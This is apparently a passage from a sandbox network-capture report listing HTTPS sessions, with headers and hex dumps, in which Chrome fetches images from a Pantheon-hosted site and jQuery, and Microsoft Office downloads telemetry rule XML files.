                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: ad 33 b4 32 78 24 a3 12 4a 2f fe 29 19 c5 14 6b 3b 1f f0 ec 7a fa 2e e7 dd 70 cc dc 6e e2 56 c2 52 28 64 2b ff 64 ff f3 51 84 ec 81 3c a9 ac 6b 46 46 65 74 54 aa 3c 64 b8 fb 64 43 ee 16 d1 2c 73 6e f4 36 d4 d6 01 1b 07 cf d8 a9 5d 8f ab 3d 8f 68 8e 84 b0 c0 dc 93 0f ed 16 d6 32 13 6e 14 96 c6 56 84 f1 ec a2 af 6d f6 76 7b c3 24 ec 2e a7 c6 65 24 18 de 6d fa f7 0a 6b 82 15 6d b3 34 45 20 ac 32 b1 fb c1 bd c2 5a 63 c8 ee 92 6a 5c c6 f0 93 23 42 d8 4f 58 16 43 6c 6a 9b a5 29 10 21 ce d0 de 05 cf fb 85 16 26 b6 a7 12 35 9a 43 10 66 19 db fb f0 7e c2 da e4 81 1b a3 ef 1a 5b b0 78 c8 e6 de 87 f7 0f 86 0e b3 a6 3b 43 4d 01 48 3e 9f 7c 7f 61 cd 31 aa 85 a5 29 00 61 74 77 68 34 cb fe c2 4a 73 3f bb 02 5f a3 39 90 24 f7 f7 df 5b 2d df bc e0 23 e6 b5 cd d2 1c 82 b0
                                                                                                                            Data Ascii: 32x$J/)k;z.pnVR(d+dQ<kFFetT<ddC,sn6]=h2nVmv{$.e$mkm4E 2Zcj\#BOXClj)!&5Cf~[x;CMH>|a1)atwh4Js?_9$[-#
                                                                                                                            2024-10-06 11:50:09 UTC1001INData Raw: d7 f9 4d 79 96 73 15 8b 5d 93 2d 71 46 89 d3 aa 63 5b 15 43 58 e1 0b be a8 ec c4 4d 7e ec 9b c5 cb 30 c9 34 21 22 7a 94 58 76 04 8b 61 3e e6 d6 d1 f7 b7 2a 15 7b a7 87 57 18 21 43 9b de 81 b9 ac 08 1b fc 9e cf 98 b3 b3 10 76 e7 1d 24 19 63 81 08 f5 da 95 2f 0b 02 4c f2 29 df 56 7b 14 b8 1b bb 85 95 dd 81 f9 11 42 44 db ad 92 11 36 b8 c6 6f 18 ab ce b4 cd 41 d8 2f 2c 80 4d 86 99 27 44 83 f6 b7 8e 8c 60 31 ca a7 7c 5d e9 84 98 c2 70 86 b0 40 b1 c0 30 49 9a f5 38 f1 48 18 ac f2 15 97 99 b2 df 56 65 71 8a b0 20 eb 6f 4d 50 47 c4 51 a5 72 3e 42 86 07 7c cc 77 76 fb 55 4f 16 ca 69 f8 39 cf 25 da 30 9c 72 ed 39 1a c1 62 9e 6f b8 51 f9 d4 bd 62 0b e6 44 9a 79 8e f3 44 40 8b eb 00 04 58 e6 3b ae b3 60 77 51 f6 2f 9c 13 31 e8 e4 12 a7 09 69 69 e5 41 d8 e0 3e 57 98
                                                                                                                            Data Ascii: Mys]-qFc[CXM~04!"zXva>*{W!Cv$c/L)V{BD6oA/,M'D`1|]p@0I8HVeq oMPGQr>B|wvUOi9%0r9boQbDyD@X;`wQ/1iiA>W


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.64976923.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC375OUTGET /asset/img/indo.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC664INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 741
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-2e5"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-d4wlz
                                                                                                                            X-Styx-Req-Id: 238735a9-83d9-11ef-b28b-da76a97beae0
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            X-Served-By: cache-chi-klot8100062-CHI, cache-ewr-kewr1740051-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215410.877603,VS0,VE39
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:09 UTC741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 2d 08 03 00 00 00 0e 73 1c 80 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 cc 50 4c 54 45 ff 13 01 ff 19 01 ff 14 01 ff 00 01 ff 14 00 f5 f5 f5 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
                                                                                                                            Data Ascii: PNGIHDRP-sgAMAa cHRMz&u0`:pQ<PLTE


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            30192.168.2.64976013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:09 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 408
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                            x-ms-request-id: b27588a3-a01e-003d-6001-1798d7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115009Z-1657d5bbd48tnj6wmberkg2xy8000000021g000000006wf5
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:09 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            31192.168.2.64975913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:09 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2160
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                            x-ms-request-id: c59bb0f9-701e-0097-2d01-17b8c1000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115009Z-1657d5bbd48sqtlf1huhzuwq7000000001s0000000002pdr
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:09 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.64977023.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC380OUTGET /asset/img/load_spin.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC664INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 5078
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-13d6"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-6df6j
                                                                                                                            X-Styx-Req-Id: 23895e88-83d9-11ef-a6e0-cebf9738eaf2
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000135-CHI, cache-ewr-kewr1740053-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215410.889565,VS0,VE39
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 06 82 fe 92 c0 00 00 12 aa 49 44 41 54 78 da ed 9d f9 7b 14 d7 95 86 df 5a 7a 51 ab b5 81 5a 3b 20 c9 80 43 8c 6d c6 78 89 6d 12 1b 18 2f f3 78 e6 c9 3f 3b 36 4e 66 1c c7 4e e2 cc 04 c6 76 12 b0 8d 6d 04 02 24 a1 0d 21 a9 5b ea 56 57 57 cd 0f 75 fb f6 ad d6 d6 6b 55 83 ee a7 07 d1 dd 52 dd 7b ce f9 74 ce b9 e7 2e 55 06 4f 01 bc bd 3e 34 b0 30 b1 88 11 27 8e 01 38 94 28 52 c0 a1 b4 df 25 9d 8f 0e 96
                                                                                                                            Data Ascii: PNGIHDRQfgAMAa cHRMz&u0`:pQ<bKGDtIMEIDATx{ZzQZ; Cmxm/x?;6NfNvm$![VWWukUR{t.UO>40'8(R%
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 37 79 bd 10 f1 18 97 99 56 66 a9 0a fc 89 bf b4 3a dd 75 06 a4 9f 8c 90 c1 50 b2 c9 26 ab 7e 7d d5 9c c6 4d 6d 72 10 c2 8d 72 99 51 f9 a1 c9 32 bf e7 96 ff e6 59 a3 43 ae 4c 96 98 67 9b 51 69 3f 8f 14 f0 d8 df 2a d1 8c d6 4d 5c 2b e8 38 c1 3b 1c 57 26 47 e6 b8 c6 5c 93 4d 77 3c 84 ee dd 8c 92 54 e6 85 0b ac 35 9b 33 1b be 52 88 34 c5 25 31 ae f2 09 b9 c3 ef fc d5 be 67 99 0e 45 ff 04 23 a4 02 63 ae f5 e6 42 75 83 d7 09 71 9e e3 4d 7a 64 d5 61 72 93 3f fa 13 d4 cf 3a 1d 8a 0d 6c 86 48 cb 65 2d 97 22 9b cd 50 d2 d0 55 d2 3b de a4 5b 4e 8f c0 d7 7c f5 ec 0c 72 eb b0 83 c9 20 3d ca 46 09 87 6c e3 76 68 20 a9 0b 31 c6 79 95 a4 dc ec b7 c3 f5 a7 bd 1e af 1f 22 c1 bb 2c e3 d0 23 3f 36 e9 c2 c5 69 2c bd d7 4d 88 a0 23 c3 ab a4 44 8f 06 db 7c c5 2d bc a3 44 86 0f
                                                                                                                            Data Ascii: 7yVf:uP&~}MmrrQ2YCLgQi?*M\+8;W&G\Mw<T53R4%1gE#cBuqMzdar?:lHe-"PU;[N|r =Flvh 1y",#?6i,M#D|-D
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 5b 9d d6 23 c4 5e e7 d3 2d 6c 9d d6 a3 82 09 22 ad 17 65 16 31 95 bb 2f 6a 84 0c f5 fc 6d 25 68 25 75 16 89 0a 15 42 3c e5 c6 7e 09 1d b4 a2 82 9a be 77 24 07 b6 f2 94 1d 8d 50 21 08 11 59 a4 12 b4 ba f5 fe 93 68 a0 7a 88 1b 08 5a f1 fa 1b d3 68 1e c1 8a a3 20 9d c2 a2 3b 6a d1 8e 26 24 21 55 41 cb a0 5b af 1d 46 81 a0 87 54 82 96 47 52 57 23 51 a0 7a 92 24 2f cb 43 4b 3e 0f 57 23 44 28 84 ec 1a 69 a5 75 35 12 3e aa 3d c4 53 1e 95 97 d4 89 3d 7c ec 9e d7 cd 8b f5 75 0f 83 01 9d d8 c3 46 80 10 b1 76 58 79 98 4b 5a fb 48 d8 d8 ed 21 1e 39 a5 1a 39 ae 2b f6 70 b1 d7 52 54 9e bc 98 ed f5 e8 25 1d b5 88 47 0b 55 84 18 e0 3f c3 d0 15 94 d8 0c 6a 1f 09 13 7b 2f d6 56 1e 4b ec d1 af 7d 24 4c ec 22 c4 00 70 d9 50 a6 e2 87 b4 8f 84 87 fd b6 33 e4 94 07 83 0d e8 9a
                                                                                                                            Data Ascii: [#^-l"e1/jm%h%uB<~w$P!YhzZh ;j&$!UA[FTGRW#Qz$/CK>W#D(iu5>=S=|uFvXyKZH!99+pRT%GU?j{/VK}$L"pP3
                                                                                                                            2024-10-06 11:50:09 UTC944INData Raw: 95 24 6f 11 c3 66 85 2f f8 1d 3f 56 ee 61 17 15 2d 4a 90 b2 c8 70 86 53 81 30 55 c2 c3 61 8d 19 16 db 5f 51 b5 d9 06 52 d5 5e de e6 3d a6 b0 03 e1 cb 66 9d 6f f8 92 1b 2c aa 7f a0 e1 41 a1 c2 a0 87 09 26 19 25 8e a3 f8 85 3f 6d 78 8f b9 f2 7d c4 da 2b 5f 08 da 4b a5 07 79 97 7f e5 24 36 26 a6 ac 52 e2 94 98 e7 3a 7f e0 16 ab e1 09 16 58 af e9 66 94 e7 18 27 0d 38 d2 2f fc 4a fc 09 77 b9 df 8e 01 ee de 08 e9 cf 51 aa 3f c2 15 ae 30 19 f0 14 3f 80 15 98 e5 cf 7c ce 2d 7f 9a ae 5d 02 56 2d 9c 25 19 e3 34 a7 e8 c3 0c a4 ef 92 20 e3 67 66 fd 79 aa b0 4c 15 62 7c 90 a6 18 e6 32 1f 30 4d 02 43 7a 8a 5f a9 d8 e4 f8 81 3f f1 15 3f f2 58 79 b6 62 d3 82 ee 5a bf 34 e9 66 88 49 a6 19 24 46 49 fa 45 25 4c ad 72 87 7b ed 1b de ee 87 90 f3 a8 34 cc 10 bf e1 3d ce 91 c6
                                                                                                                            Data Ascii: $of/?Va-JpS0Ua_QR^=fo,A&%?mx}+_Ky$6&R:Xf'8/JwQ?0?|-]V-%4 gfyLb|20MCz_??XybZ4fI$FIE%Lr{4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            33192.168.2.64975713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:09 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2980
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                            x-ms-request-id: 8aaf7b13-d01e-0028-46fd-167896000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115009Z-1657d5bbd48sqtlf1huhzuwq7000000001mg00000000chpw
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:09 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            34192.168.2.64975613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:09 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 3788
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                            x-ms-request-id: 4545068c-701e-0050-0e05-176767000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115009Z-1657d5bbd482tlqpvyz9e93p54000000023g000000002h2p
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:09 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            35192.168.2.64975813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:09 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 450
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                            x-ms-request-id: d4448e94-101e-00a2-2703-179f2e000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115009Z-1657d5bbd482tlqpvyz9e93p5400000001zg00000000b50h
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:09 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.649776151.101.130.1374436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC358OUTGET /jquery-3.5.1.min.js HTTP/1.1
                                                                                                                            Host: code.jquery.com
                                                                                                                            Connection: keep-alive
